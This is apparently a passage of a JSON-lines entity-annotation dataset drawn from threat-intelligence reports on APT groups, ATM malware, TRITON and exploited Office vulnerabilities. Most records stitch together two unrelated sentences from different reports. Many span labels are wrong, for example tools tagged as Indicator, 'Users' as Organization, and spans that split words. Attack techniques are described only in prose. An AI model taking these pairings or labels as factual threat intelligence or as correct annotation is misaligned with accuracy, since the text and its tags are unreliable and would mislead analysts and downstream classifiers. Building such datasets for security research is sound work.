The usefulness of flare-qdb can be seen in cases such as loops dealing with strings .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 62, "end": 77, "label": "Vulnerability"}, {"start": 152, "end": 161, "label": "Indicator"}]} {"text": "More information on this threat actor is found in our report , APT37 (Reaper): The Overlooked North Korean Actor . The usefulness of flare-qdb can be seen in cases such as loops dealing with strings .", "spans": [{"start": 63, "end": 68, "label": "Organization"}, {"start": 133, "end": 142, "label": "Indicator"}]} {"text": "There have been reports of real-time phishing in the wild as early as 2010 . The usefulness of flare-qdb can be seen in cases such as loops dealing with strings .", "spans": [{"start": 95, "end": 104, "label": "Indicator"}]} {"text": "Explanation of ToolTo improve social engineering assessments , we developed a tool \u2013 named ReelPhish \u2013 that simplifies the real-time phishing technique . Attaching with IDA Pro via WinDbg as in Figure 11 shows that the program counter points to the infinite loop written in memory allocated by flare-qdb .", "spans": [{"start": 91, "end": 100, "label": "System"}, {"start": 169, "end": 176, "label": "Indicator"}, {"start": 181, "end": 187, "label": "Indicator"}]} {"text": "We assess with high confidence that this activity is carried out on behalf of the North Korean government given malware development artifacts and targeting that aligns with North Korean state interests . We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations .", "spans": [{"start": 226, "end": 230, "label": "Indicator"}]} {"text": "Known targets of this group have been involved in the maritime industry , as well as engineering-focused entities , and include research institutes , academic organizations , and private firms in the United States . 
Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control ( C2 ) server .", "spans": [{"start": 22, "end": 27, "label": "Organization"}, {"start": 54, "end": 62, "label": "Organization"}, {"start": 128, "end": 147, "label": "Organization"}, {"start": 150, "end": 172, "label": "Organization"}, {"start": 179, "end": 192, "label": "Organization"}, {"start": 305, "end": 313, "label": "Indicator"}, {"start": 318, "end": 325, "label": "Indicator"}, {"start": 403, "end": 405, "label": "System"}]} {"text": "By releasing ReelPhish , we at Mandiant hope to highlight the need for multiple layers of security and discourage the reliance on any single security mechanism . The attachment in these emails is a weaponized Microsoft Office document containing a malicious macro that \u2013 when enabled \u2013 leads to the download of Hancitor .", "spans": [{"start": 31, "end": 39, "label": "Organization"}, {"start": 186, "end": 192, "label": "System"}, {"start": 311, "end": 319, "label": "Indicator"}]} {"text": "The group has also been reported as Leviathanby other security firms . After the executable is executed , it downloads Pony and Vawtrak malware variants to steal data .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 36, "end": 47, "label": "Organization"}, {"start": 119, "end": 123, "label": "Indicator"}, {"start": 128, "end": 135, "label": "Indicator"}]} {"text": "Like multiple other Chinese cyber espionage actors , TEMP.Periscope has recently re-emerged and has been observed conducting operations with a revised toolkit . 
Upon execution , it will communicate with an attacker-controller website to download a variant of the Pony malware , pm.dll\u201d along with a standard Vawtrak Trojan .", "spans": [{"start": 53, "end": 67, "label": "Organization"}, {"start": 263, "end": 275, "label": "Indicator"}, {"start": 278, "end": 285, "label": "Indicator"}, {"start": 316, "end": 322, "label": "Malware"}]} {"text": "The tool then starts a new web browser instance on the attacker\u2019s system and submits credentials on the real VPN portal . In this blog , FireEye Labs dissects this new ATM malware that we have dubbed RIPPER and documents indicators that strongly suggest this piece of malware is the one used to steal from the ATMs at banks in Thailand .", "spans": [{"start": 55, "end": 65, "label": "Organization"}, {"start": 137, "end": 144, "label": "Organization"}, {"start": 168, "end": 171, "label": "System"}, {"start": 172, "end": 179, "label": "Malware"}, {"start": 200, "end": 206, "label": "Malware"}, {"start": 318, "end": 323, "label": "Organization"}]} {"text": "These tools include:AIRBREAK: a JavaScript-based backdoor also reported as Orz that retrieves commands from hidden strings in compromised webpages and actor controlled profiles on legitimate services.BADFLICK: a backdoor that is capable of modifying the file system , generating a reverse shell , and modifying its command and control (C2) configuration . RIPPER interacts with the ATM by inserting a specially manufactured ATM card with an EMV chip that serves as the authentication mechanism .", "spans": [{"start": 32, "end": 57, "label": "System"}, {"start": 356, "end": 362, "label": "Malware"}]} {"text": "HOMEFRY: a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors . 
RIPPER will examine the contents of directories associated with the targeted ATM vendors and will replace legitimate executables with itself .", "spans": [{"start": 100, "end": 108, "label": "System"}, {"start": 113, "end": 121, "label": "System"}, {"start": 134, "end": 140, "label": "Malware"}, {"start": 211, "end": 222, "label": "Organization"}]} {"text": "The following are tools that TEMP.Periscope has leveraged in past operations and could use again , though these have not been seen in the current wave of activity:Beacon: a backdoor that is commercially available as part of the Cobalt Strike software platform , commonly used for pen-testing network environments . This malware family can be used to compromise multiple vendor platforms and leverages uncommon technology to access physical devices .", "spans": [{"start": 29, "end": 43, "label": "Organization"}, {"start": 228, "end": 241, "label": "Organization"}, {"start": 320, "end": 327, "label": "Indicator"}]} {"text": "This entry was posted on Fri Mar 16 00:00 EDT 2018 and filed under Targeted Attacks , FireEye , and China . From our trend analysis seen in Figure 3 , Locky ransomware started being delivered via DOCM format email attachments more extensively beginning in August .", "spans": [{"start": 86, "end": 93, "label": "Organization"}, {"start": 151, "end": 156, "label": "Indicator"}, {"start": 208, "end": 213, "label": "System"}]} {"text": "Read our report , APT37 (Reaper): The Overlooked North Korean Actor , to learn more about our assessment that this threat actor is working on behalf of the North Korean government , as well as various other details about their operations . 
Discovered for the first time in Mexico back in 2013 , Ploutus enabled criminals to empty ATMs using either an external keyboard attached to the machine or via SMS message , a technique that had never been seen before .", "spans": [{"start": 18, "end": 23, "label": "Organization"}, {"start": 156, "end": 179, "label": "Organization"}, {"start": 295, "end": 302, "label": "Indicator"}]} {"text": "A brief timeline of this activity is shown in Figure 1.Figure 1: Timeline of this recently observed spear phishing campaign . FireEye Labs recently identified a previously unobserved version of Ploutus , dubbed Ploutus-D , that interacts with KAL\u2019s Kalignite multivendor ATM platform .", "spans": [{"start": 126, "end": 133, "label": "Organization"}, {"start": 194, "end": 201, "label": "Indicator"}, {"start": 211, "end": 220, "label": "Indicator"}]} {"text": "The first part of the campaign From Jan. 23 , 2018 , to Feb. 26 , 2018 used a macro-based document that dropped a VBS file and an INI file . The samples we identified target the ATM vendor Diebold .", "spans": [{"start": 114, "end": 122, "label": "Malware"}, {"start": 130, "end": 138, "label": "Malware"}, {"start": 145, "end": 152, "label": "Indicator"}, {"start": 178, "end": 196, "label": "Organization"}]} {"text": "One such email that we were able to obtain was targeting users in Turkey , as shown in Figure 4:Figure 4: Sample spear phishing email containing macro-based document attachment The malicious Microsoft Office attachments that we observed appear to have been specially crafted for individuals in four countries: Turkey , Pakistan , Tajikistan and India . 
This blog covers the changes , improvements , and Indicators of Compromise (IOC) of Ploutus-D in order to help financial organizations identify and defend against this threat .", "spans": [{"start": 208, "end": 219, "label": "System"}, {"start": 437, "end": 446, "label": "Indicator"}, {"start": 464, "end": 473, "label": "Organization"}]} {"text": "The INI file contains the Base64 encoded PowerShell command , which will be decoded and executed by PowerShell using the command line generated by the VBS file on execution using WScript.exe . Ploutus-D also allows the attackers to enter the amount to withdraw (billUnits \u2013 4 digits) and the number of cycles (billCount \u2013 2 digits) to repeat the dispensing operation (see Figure 10) .", "spans": [{"start": 4, "end": 12, "label": "Malware"}, {"start": 100, "end": 110, "label": "System"}, {"start": 151, "end": 159, "label": "Malware"}, {"start": 179, "end": 190, "label": "Malware"}, {"start": 193, "end": 202, "label": "Indicator"}, {"start": 219, "end": 228, "label": "Organization"}]} {"text": "cmstp.exe system restart , cmstp.exe will be used to execute the SCT file indirectly through the INF file . Ploutus-D will load KXCashDispenserLib\u201d library implemented by Kalignite Platform (K3A.Platform.dll) to interact with the XFS Manager and control the Dispenser (see Figure 13) .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 27, "end": 36, "label": "Malware"}, {"start": 65, "end": 73, "label": "Malware"}, {"start": 97, "end": 105, "label": "Malware"}, {"start": 108, "end": 117, "label": "Indicator"}, {"start": 190, "end": 208, "label": "Indicator"}]} {"text": "The following are the three files:Defender.sct \u2013 The malicious JavaScript based scriptlet file . 
Since Ploutus-D interacts with the Kalignite Platform , only minor modifications to the Ploutus-D code may be required to target different ATM vendors worldwide .", "spans": [{"start": 28, "end": 46, "label": "Malware"}, {"start": 80, "end": 89, "label": "Malware"}, {"start": 90, "end": 94, "label": "Malware"}, {"start": 103, "end": 112, "label": "Indicator"}, {"start": 185, "end": 194, "label": "Indicator"}, {"start": 236, "end": 247, "label": "Organization"}]} {"text": "FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017 . The threat actors used two publicly available techniques , an AppLocker whitelisting bypass and a script to inject shellcode into the userinit.exe process .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 79, "end": 93, "label": "Vulnerability"}, {"start": 178, "end": 184, "label": "Organization"}, {"start": 301, "end": 313, "label": "Indicator"}]} {"text": "Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors . The regsvr32.exe executable can be used to download a Windows Script Component file (SCT file) by passing the URL of the SCT file as an argument .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 93, "end": 99, "label": "Organization"}, {"start": 106, "end": 118, "label": "Indicator"}, {"start": 156, "end": 163, "label": "System"}, {"start": 223, "end": 231, "label": "Indicator"}]} {"text": "This entry was posted on Tue Mar 13 12:15 EDT 2018 and filed under Yogesh Londhe , Dileep . 
We observed implementation of this bypass in the macro code to invoke regsvr32.exe , along with a URL passed to it which was hosting a malicious SCT file .", "spans": [{"start": 67, "end": 80, "label": "Organization"}, {"start": 83, "end": 89, "label": "Organization"}, {"start": 162, "end": 174, "label": "Indicator"}, {"start": 237, "end": 245, "label": "Indicator"}]} {"text": "If the lateral movement with credentials fails , then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue , and uses it to spread to that host . There was code to download a decoy document from the Internet and open it in a second winword.exe process using the Start-Process cmdlet .", "spans": [{"start": 71, "end": 90, "label": "System"}, {"start": 218, "end": 229, "label": "Vulnerability"}, {"start": 355, "end": 366, "label": "Indicator"}, {"start": 385, "end": 398, "label": "Indicator"}, {"start": 399, "end": 405, "label": "Indicator"}]} {"text": "Tactic #1: Delivering the miner directly to a vulnerable serverSome tactics we've observed involve exploiting CVE-2017-10271 , leveraging PowerShell to download the miner directly onto the victim\u2019s system (Figure 1) , and executing it using ShellExecute() . Ordnance will be able to immediately generate shellcode after users provide the IP and PROT that the shellcode should connect to or listen on .", "spans": [{"start": 110, "end": 124, "label": "Vulnerability"}, {"start": 138, "end": 148, "label": "System"}, {"start": 258, "end": 266, "label": "Indicator"}, {"start": 338, "end": 340, "label": "Indicator"}, {"start": 359, "end": 368, "label": "Indicator"}]} {"text": "The malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server . 
DarkPulsar is a very interesting administrative module for controlling a passive backdoor named ' sipauth32.tsp ' that provides remote control , belonging to this category .", "spans": [{"start": 87, "end": 104, "label": "System"}, {"start": 156, "end": 166, "label": "Malware"}, {"start": 237, "end": 245, "label": "Malware"}, {"start": 254, "end": 267, "label": "Indicator"}]} {"text": "Notably , cryptocurrency mining malware is being distributed using various tactics , typically in an opportunistic and indiscriminate manner so cyber criminals will maximize their outreach and profits . One of them \u2013 ipv4.dll \u2013 has been placed by the APT with what is , in fact , a downloader for other malicious components .", "spans": [{"start": 67, "end": 82, "label": "System"}, {"start": 144, "end": 159, "label": "Organization"}, {"start": 217, "end": 225, "label": "Indicator"}, {"start": 282, "end": 292, "label": "Malware"}]} {"text": "After all network derived IPs have been processed , the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host . Written in pure C language , Canhadr/Ndriver provides full access to the hard drive and operating memory despite device security restrictions , and carries out integrity control of various system components to avoid debugging and security detection .", "spans": [{"start": 56, "end": 63, "label": "Malware"}, {"start": 118, "end": 128, "label": "Malware"}, {"start": 133, "end": 144, "label": "Malware"}, {"start": 186, "end": 187, "label": "System"}, {"start": 199, "end": 214, "label": "Indicator"}]} {"text": "They have taken interest in subject matter of direct importance to the Democratic People's Republic of Korea (DPRK) such as Korean unification efforts and North Korean defectors . 
First observed in mid-2014 , this malware shared code with the Bugat ( aka Feodo ) banking Trojan .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 243, "end": 248, "label": "Malware"}, {"start": 255, "end": 260, "label": "Malware"}, {"start": 263, "end": 270, "label": "Organization"}, {"start": 271, "end": 277, "label": "Malware"}]} {"text": "We assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper . In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload .", "spans": [{"start": 54, "end": 62, "label": "Vulnerability"}, {"start": 110, "end": 121, "label": "Organization"}, {"start": 131, "end": 137, "label": "System"}, {"start": 152, "end": 172, "label": "Organization"}, {"start": 214, "end": 247, "label": "Indicator"}, {"start": 267, "end": 280, "label": "Vulnerability"}]} {"text": "Historically , the majority of their targeting has been focused on the South Korean government , military , and defense industrial base . Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word .", "spans": [{"start": 71, "end": 94, "label": "Organization"}, {"start": 97, "end": 105, "label": "Organization"}, {"start": 112, "end": 119, "label": "Organization"}, {"start": 217, "end": 230, "label": "Vulnerability"}, {"start": 234, "end": 241, "label": "Vulnerability"}, {"start": 242, "end": 256, "label": "Indicator"}]} {"text": "While we have observed other suspected North Korean threat groups such as TEMP.Hermit employ wiper malware in disruptive attacks , we have not thus far observed TEMP.Reaper use their wiper malware actively against any targets . 
Whitefly first infects its victims using a dropper in the form of a malicious.exe or .dll file that is disguised as a document or image .", "spans": [{"start": 74, "end": 85, "label": "Organization"}, {"start": 161, "end": 172, "label": "Organization"}, {"start": 228, "end": 236, "label": "Organization"}, {"start": 271, "end": 278, "label": "Malware"}, {"start": 296, "end": 309, "label": "Indicator"}, {"start": 313, "end": 322, "label": "Indicator"}]} {"text": "In the past year , FireEye iSIGHT Intelligence has discovered newly developed wiper malware being deployed by TEMP.Reaper , which we detect as RUHAPPY . CraP2P has frequently been used to distribute other malware such as Locky and Dridex , but also supported large scale spam campaigns for dating advertisement and pump-and-dump scams after the demise of Kelihos .", "spans": [{"start": 19, "end": 33, "label": "Organization"}, {"start": 110, "end": 121, "label": "Organization"}, {"start": 153, "end": 159, "label": "Indicator"}, {"start": 221, "end": 226, "label": "Malware"}, {"start": 231, "end": 237, "label": "Malware"}]} {"text": "Historically , the majority of their targeting has been focused on the South Korean government , military , and defense industrial base . Once the LOWBALL malware calls back to the Dropbox account , the admin@338 will create a file called upload.bat which contains commands to be executed on the compromised computer .", "spans": [{"start": 71, "end": 94, "label": "Organization"}, {"start": 97, "end": 105, "label": "Organization"}, {"start": 112, "end": 119, "label": "Organization"}, {"start": 147, "end": 154, "label": "Malware"}, {"start": 155, "end": 162, "label": "Malware"}, {"start": 181, "end": 188, "label": "System"}, {"start": 203, "end": 212, "label": "Organization"}, {"start": 239, "end": 249, "label": "Indicator"}]} {"text": "FireEye products have robust detection for the malware used in this campaign . 
In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 89, "end": 94, "label": "Organization"}, {"start": 193, "end": 204, "label": "Indicator"}, {"start": 264, "end": 272, "label": "Organization"}]} {"text": "TEMP.Periscope BackgroundActive since at least 2013 , TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals , including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe \" .", "spans": [{"start": 0, "end": 14, "label": "Organization"}, {"start": 54, "end": 68, "label": "Organization"}, {"start": 94, "end": 110, "label": "Organization"}, {"start": 157, "end": 174, "label": "Organization"}, {"start": 177, "end": 185, "label": "Organization"}, {"start": 190, "end": 204, "label": "Organization"}, {"start": 207, "end": 220, "label": "Organization"}, {"start": 223, "end": 230, "label": "Organization"}, {"start": 233, "end": 243, "label": "Organization"}, {"start": 258, "end": 279, "label": "Organization"}, {"start": 292, "end": 297, "label": "Organization"}, {"start": 396, "end": 407, "label": "Indicator"}]} {"text": "TEMP.Periscope BackgroundActive since at least 2013 , TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals , including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities . 
More recently , in May 2017 , APT33 appeared to target a Saudi organization and a South Korean business conglomerate using a malicious file that attempted to entice victims with job vacancies for a Saudi Arabian petrochemical company .", "spans": [{"start": 0, "end": 14, "label": "Organization"}, {"start": 54, "end": 68, "label": "Organization"}, {"start": 94, "end": 110, "label": "Organization"}, {"start": 157, "end": 174, "label": "Organization"}, {"start": 177, "end": 185, "label": "Organization"}, {"start": 190, "end": 204, "label": "Organization"}, {"start": 207, "end": 220, "label": "Organization"}, {"start": 223, "end": 230, "label": "Organization"}, {"start": 233, "end": 243, "label": "Organization"}, {"start": 258, "end": 279, "label": "Organization"}, {"start": 312, "end": 317, "label": "Organization"}, {"start": 345, "end": 357, "label": "Organization"}, {"start": 377, "end": 398, "label": "Organization"}, {"start": 407, "end": 421, "label": "Indicator"}, {"start": 494, "end": 515, "label": "Organization"}]} {"text": "Infection VectorWe have observed this recent wave of Zyklon malware being delivered primarily through spam emails . More recently , in May 2017 , APT33 appeared to target organizations in Saudi and South Korea using a malicious file that attempted to entice victims with job vacancies .", "spans": [{"start": 53, "end": 59, "label": "Organization"}, {"start": 102, "end": 113, "label": "System"}, {"start": 146, "end": 151, "label": "Organization"}, {"start": 218, "end": 232, "label": "Indicator"}]} {"text": "The document files exploit at least three known vulnerabilities in Microsoft Office , which we discuss in the Infection Techniques section . 
In fact , REDBALDKNIGHT has been targeting Japan as early as 2008 , based on the file properties of the decoy documents they've been sending to their targets .", "spans": [{"start": 4, "end": 18, "label": "Malware"}, {"start": 48, "end": 63, "label": "Vulnerability"}, {"start": 151, "end": 164, "label": "Organization"}, {"start": 245, "end": 260, "label": "Indicator"}]} {"text": "Figure 2: Zyklon attack flowInfection Techniques CVE-2017-8759 . In fact , REDBALDKNIGHT has been zeroing in on Japanese organizations as early as 2008 \u2014 at least based on the file properties of the decoy documents they've been sending to their targets .", "spans": [{"start": 10, "end": 16, "label": "Organization"}, {"start": 49, "end": 62, "label": "Vulnerability"}, {"start": 75, "end": 88, "label": "Organization"}, {"start": 199, "end": 214, "label": "Indicator"}]} {"text": "This vulnerability was discovered by FireEye in September 2017 , and it is a vulnerability we have observed being exploited in the wild . Carbanak is a backdoor used by the attackers to compromise the victim .", "spans": [{"start": 5, "end": 18, "label": "Vulnerability"}, {"start": 37, "end": 44, "label": "Organization"}, {"start": 138, "end": 146, "label": "Indicator"}, {"start": 152, "end": 160, "label": "Malware"}, {"start": 173, "end": 182, "label": "Organization"}]} {"text": "We have observed this recent wave of Zyklon malware being delivered primarily through spam emails . This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 .", "spans": [{"start": 37, "end": 43, "label": "Organization"}, {"start": 86, "end": 97, "label": "System"}, {"start": 152, "end": 158, "label": "System"}, {"start": 164, "end": 188, "label": "Indicator"}, {"start": 200, "end": 213, "label": "Vulnerability"}]} {"text": "The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so . 
The Korean-language Word document manual.doc appeared in Vietnam on January 17 , with the original author name of Honeybee .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 150, "end": 163, "label": "Malware"}, {"start": 164, "end": 174, "label": "Indicator"}, {"start": 244, "end": 252, "label": "Organization"}]} {"text": "Figure 3: Embedded URL in OLE object CVE-2017-11882 Similarly , we have also observed actors leveraging another recently discovered vulnerability (CVE-2017-11882) in Microsoft Office . This malicious document contains a Visual Basic macro that dropped and executed an upgraded version of the implant known as SYSCON , which appeared in 2017 in malicious Word documents as part of several campaigns using North Korea\u2013related topics .", "spans": [{"start": 37, "end": 51, "label": "Vulnerability"}, {"start": 86, "end": 92, "label": "Organization"}, {"start": 146, "end": 162, "label": "Vulnerability"}, {"start": 309, "end": 315, "label": "Malware"}, {"start": 344, "end": 368, "label": "Indicator"}]} {"text": "It follows Stuxnet which was used against Iran in 2010 and Industroyer which we believe was deployed by Sandworm Team against Ukraine in 2016 . Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) .", "spans": [{"start": 104, "end": 112, "label": "Organization"}, {"start": 144, "end": 152, "label": "Organization"}, {"start": 174, "end": 178, "label": "System"}, {"start": 179, "end": 187, "label": "Vulnerability"}, {"start": 204, "end": 217, "label": "Vulnerability"}, {"start": 263, "end": 277, "label": "Indicator"}, {"start": 280, "end": 293, "label": "Vulnerability"}, {"start": 300, "end": 316, "label": "Malware"}, {"start": 319, "end": 332, "label": "Vulnerability"}]} {"text": "Command & Control Communication The C2 communication of Zyklon is proxied through the Tor network . 
For example , DeltaAlfa specifies a DDoS bot family identified as Alfa .", "spans": [{"start": 56, "end": 62, "label": "Organization"}, {"start": 86, "end": 97, "label": "System"}, {"start": 114, "end": 123, "label": "Indicator"}, {"start": 136, "end": 144, "label": "Malware"}]} {"text": "At this time of writing , FireEye Multi Vector Execution (MVX) engine is able to recognize and block this threat . This alert 's IOC files provide HIDDEN COBRA indicators related to FALLCHILL .", "spans": [{"start": 26, "end": 33, "label": "Organization"}, {"start": 57, "end": 62, "label": "System"}, {"start": 129, "end": 138, "label": "Indicator"}, {"start": 147, "end": 159, "label": "Organization"}, {"start": 182, "end": 191, "label": "Malware"}]} {"text": "The targeting of critical infrastructure to disrupt , degrade , or destroy systems is consistent with numerous attack and reconnaissance activities carried out globally by Russian , Iranian , North Korean , U.S. , and Israeli nation state actors . The McAfee Advanced Threat Research team discovered a previously unknown data-gathering implant that surfaced in mid-February 2018 .", "spans": [{"start": 17, "end": 40, "label": "Organization"}, {"start": 239, "end": 245, "label": "Organization"}, {"start": 252, "end": 283, "label": "Organization"}, {"start": 321, "end": 343, "label": "Indicator"}]} {"text": "Specifically , the following facts support this assessment: The attacker targeted the SIS suggesting an interest in causing a high-impact attack with physical consequences . This alert 's IOC files provide HIDDEN COBRA indicators related to FALLCHILL .", "spans": [{"start": 64, "end": 72, "label": "Organization"}, {"start": 188, "end": 197, "label": "Indicator"}, {"start": 206, "end": 218, "label": "Organization"}, {"start": 241, "end": 250, "label": "Malware"}]} {"text": "First , the attacker\u2019s mission is to disrupt an operational process rather than steal data . 
The McAfee Advanced Threat Research team discovered a previously unknown data-gathering implant that surfaced in mid-February 2018 .", "spans": [{"start": 12, "end": 22, "label": "Organization"}, {"start": 97, "end": 128, "label": "Organization"}, {"start": 166, "end": 188, "label": "Indicator"}]} {"text": "The TRITON malware contained the capability to communicate with Triconex SIS controllers . Documents with the flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal .", "spans": [{"start": 4, "end": 18, "label": "System"}, {"start": 91, "end": 100, "label": "Indicator"}, {"start": 110, "end": 115, "label": "System"}, {"start": 116, "end": 123, "label": "Vulnerability"}, {"start": 185, "end": 192, "label": "Vulnerability"}, {"start": 196, "end": 206, "label": "System"}]} {"text": "the attacker did not leverage all of TRITON\u2019s extensive reconnaissance capabilities . This malware report contains analysis of one 32-bit Windows executable file , identified as a Remote Access Trojan ( RAT ) .", "spans": [{"start": 4, "end": 12, "label": "Organization"}, {"start": 37, "end": 45, "label": "Organization"}, {"start": 131, "end": 161, "label": "Indicator"}, {"start": 180, "end": 200, "label": "Malware"}, {"start": 203, "end": 206, "label": "Malware"}]} {"text": "This file is decrypted and injected into an instance of InstallUtiil.exe , and functions as a Tor anonymizer . In one of the samples received for analysis , the US-CERT Code Analysis Team observed botnet controller functionality .", "spans": [{"start": 56, "end": 72, "label": "Malware"}, {"start": 94, "end": 97, "label": "Malware"}, {"start": 98, "end": 108, "label": "Malware"}, {"start": 161, "end": 187, "label": "Organization"}, {"start": 197, "end": 214, "label": "Indicator"}]} {"text": "For instance , Russian operators , such as Sandworm Team , have compromised Western ICS over a multi-year period without causing a disruption . 
Volgmer payloads have been observed in 32-bit form as either executables or dynamic-link library ( .dll )", "spans": [{"start": 43, "end": 51, "label": "Organization"}, {"start": 144, "end": 151, "label": "Malware"}, {"start": 220, "end": 240, "label": "System"}, {"start": 243, "end": 247, "label": "Indicator"}]} {"text": "The TRITON sample Mandiant analyzed added an attacker-provided program to the execution table of the Triconex controller . Trend Micro endpoint solutions such as Trend Micro\u2122 Smart Protection Suites and Worry-Free\u2122 Business Security can protect users and businesses from these threats by detecting malicious files and spammed messages as well as blocking all related malicious URLs .", "spans": [{"start": 4, "end": 10, "label": "Organization"}, {"start": 18, "end": 26, "label": "Organization"}, {"start": 101, "end": 120, "label": "System"}, {"start": 123, "end": 134, "label": "Organization"}, {"start": 162, "end": 198, "label": "Organization"}, {"start": 203, "end": 232, "label": "Organization"}, {"start": 255, "end": 265, "label": "Organization"}, {"start": 298, "end": 313, "label": "Indicator"}]} {"text": "Along with the executable , two binary files , inject.bin (malicious function code) and imain.bin (malicious control logic) , were deployed as the controller\u2019s payload . WannaCry appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD ( via Bitcoin ) to decrypt the data .", "spans": [{"start": 32, "end": 44, "label": "Malware"}, {"start": 88, "end": 97, "label": "Malware"}, {"start": 170, "end": 178, "label": "Malware"}, {"start": 217, "end": 222, "label": "Indicator"}, {"start": 308, "end": 315, "label": "System"}]} {"text": "We assess that this was an anti-forensics technique to hide the presence of the attacker code on the Triconex controller . 
Some of the documents exploited CVE-2017-0199 to deliver the payload .", "spans": [{"start": 80, "end": 88, "label": "Organization"}, {"start": 101, "end": 120, "label": "System"}, {"start": 135, "end": 144, "label": "Indicator"}, {"start": 155, "end": 168, "label": "Vulnerability"}]} {"text": "This entry was posted on Thu Dec 14 10:00 EST 2017 and filed under Malware , Nathan Brubaker , Christopher Glyer , Blake Johnson , Dan Caban , Marina Krotofil , ICS Security , and Dan Scali . The Leviathan also occasionally used macro-laden Microsoft Word documents to target other US research and development organizations during this period .", "spans": [{"start": 161, "end": 173, "label": "Organization"}, {"start": 196, "end": 205, "label": "Organization"}, {"start": 229, "end": 265, "label": "Indicator"}, {"start": 298, "end": 323, "label": "Organization"}]} {"text": "This isn\u2019t a bad thing as it shows a natural grouping of nodes that could be a good candidate to group to help simplify the overall graph and make analysis easier . The download name was \" Zawgyi_Keyboard_L.zip \" , and it dropped a \" setup.exe \" that contained several backdoor components , including an Elise \" wincex.dll \" ( a42c966e26f3577534d03248551232f3 , detected as Backdoor.Win32.Agent.delp ) .", "spans": [{"start": 26, "end": 28, "label": "Malware"}, {"start": 111, "end": 137, "label": "Malware"}, {"start": 142, "end": 162, "label": "Malware"}, {"start": 189, "end": 210, "label": "Indicator"}, {"start": 234, "end": 243, "label": "Indicator"}, {"start": 304, "end": 309, "label": "Malware"}, {"start": 312, "end": 322, "label": "Indicator"}, {"start": 327, "end": 359, "label": "Indicator"}, {"start": 374, "end": 399, "label": "Malware"}]} {"text": "Keeping in mind the sensitivity of passwords , GoCrack includes an entitlement-based system that prevents users from accessing task data unless they are the original creator or they grant additional users to the task . 
Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 .", "spans": [{"start": 47, "end": 54, "label": "Organization"}, {"start": 188, "end": 204, "label": "Organization"}, {"start": 240, "end": 264, "label": "Indicator"}, {"start": 281, "end": 288, "label": "Vulnerability"}, {"start": 293, "end": 300, "label": "System"}, {"start": 301, "end": 343, "label": "System"}, {"start": 344, "end": 357, "label": "Vulnerability"}, {"start": 369, "end": 382, "label": "Vulnerability"}]} {"text": "Throughout 2017 , we observed two versions of BACKSWING and saw a significant increase in May with an apparent focus on compromising Ukrainian websites . To set up persistence , the loader writes a file to \" c:\\temp\\rr.exe \" and executes it with specific command line arguments to create auto run registry keys .", "spans": [{"start": 46, "end": 55, "label": "System"}, {"start": 208, "end": 222, "label": "Indicator"}]} {"text": "During our investigation into the activity , FireEye identified a direct overlap between BADRABBIT redirect sites and sites hosting a profiler we\u2019ve been tracking as BACKSWING . The Magic Hound campaign was also discovered using a custom dropper tool , which we have named MagicHound.DropIt .", "spans": [{"start": 45, "end": 52, "label": "Organization"}, {"start": 89, "end": 98, "label": "Malware"}, {"start": 166, "end": 175, "label": "System"}, {"start": 231, "end": 245, "label": "Malware"}, {"start": 273, "end": 290, "label": "Indicator"}]} {"text": "This entry was posted on Tue Nov 28 14:00 EST 2017 and filed under Malware , Sandor Nemes , Malware Analysis , and Abhay Vaish . 
